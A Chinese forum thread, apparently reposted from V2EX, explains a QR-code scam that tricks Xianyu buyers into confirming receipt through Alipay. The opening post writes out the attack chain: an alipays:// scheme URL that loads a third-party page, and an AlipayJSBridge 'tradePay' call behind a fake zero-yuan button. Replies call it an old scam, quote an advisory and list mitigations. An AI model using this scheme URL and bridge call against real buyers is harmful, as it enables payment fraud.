给你个二维码,扫描后看上去是支付运费,其实是咸鱼交易确认收货
1. 先用支付宝 schema 打开第三方的网址:alipays://platformapi/startapp?appId=20000067&url=http://kgnb763n.blogqt.gq/index.php
2. 在 http://kgnb763n.blogqt.gq/index.php 的网页里面通过伪装的 0 元确认按钮事件触发: AlipayJSBridge.call("tradePay", { tradeNO: "2023042622001174211404250439" }, function(result) {});
其中 tradeNO 对应的就是闲鱼的订单号,所以就会出现扫个码就把订单给确认了的情况。
https://www.v2ex.com/t/937597
热议
推荐楼 worryfree 昨天20:15
人傻就应该多交点学费
3.你的好老哥发来一个二维码,告知需要扫码获得免费的价保,或者是告诉你扫码支付运费新人可能是零元
2楼 CJ大牛赚美元 昨天17:23
美国黑客:是梗吗????????????
3楼 jiangfei 昨天17:25
中国黑客:呵呵
4楼 Corei7 昨天17:26
文不对题
海鲜市场的老骗局了
5楼 sharp097 昨天17:26
在风向旗的群里看到推送了~
6楼 sharp097 昨天17:28
引用一下:
支付宝流程设计存在安全缺陷,会导致跨域攻击,咸鱼/淘宝交易慎扫不明二维码
目前支付宝存在逻辑漏洞,一个精心构造的虚假页面可以直接拉起确认收货提示框,如果此时确认收货会钱货两空。
虽然确认收货需要二次验证(密码、指纹、面容),但如果使用了 Face ID,这个二次验证基本等于自动确认。Mozzie(蚊子)大佬录制了一段视频来展示复现过程,可以看到在开启 Face ID 的情况下会直接完成确认收货操作。
目前支付宝似乎已对大额交易进行风控(确认收货后仍然冻结 3 天资金),但是小额交易仍需谨慎。
这个问题在一周前就已在知乎(相关文章)和小红书等平台被数人提起,但至今除了风控之外没有进一步动作。(Soha 的日常频道)
淘宝系 App 本身并不提供担保服务,担保交易功能由支付宝提供。这个接口是公开的 isbridge 接口,不管是阿里系还是第三方都在调用这个接口。接口设计之初并没有考虑到根据调用域名来鉴权,所以并不容易改动。
PS :看起来调用这个接口时支付宝并没有做二次确认,直接触发了确认流程( FaceID ) ,连付款都是假的。这个页面全套流程都是假的,但用户看到的流程和「支付 1 元」的流程别无二致,大概也是这么多人上当的原因。反而不是代码上的漏洞,而是逻辑上的漏洞。最简单的修复方式大概是在支付宝 SOK 里对「确认收货」行为做二次弹窗确认了。
在官方修复前(距问题发现已一周多),目前能想到的缓解措施如下:
· 避免扫难以确认安全性的二维码,尤其是在网购交易过程中
· 关闭人脸支付,避免扫到问题二维码后,无交互式的直接确认了
· 关闭小额免密支付
—— V2EX
7楼 jacob 昨天20:12
之前快手看到了
9楼 usbcdrom 昨天22:53
文不对题
海鲜市场的老骗局了
抖音B站都有测试视频了,一个买相机的被骗了5800
10楼 奧巴马 昨天22:55
usbcdrom 发表于 2023-5-6 22:53
抖音B站都有测试视频了,一个买相机的被骗了5800
这个方式的骗局好老了。一直都存在的!
12楼 HOH 6小时前
这骗术都包浆了,一眼丁真鉴定为年经帖
13楼 ekucn 2小时前
这种没物流的确认收货,卖家收到款会在支付宝冻结7天才能提现。
买家觉得不对打电话给客服,核实后钱就回来了。
算漏洞,但真被骗可能性不高
14楼 DogeLee2 2小时前
这玩的有点6
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。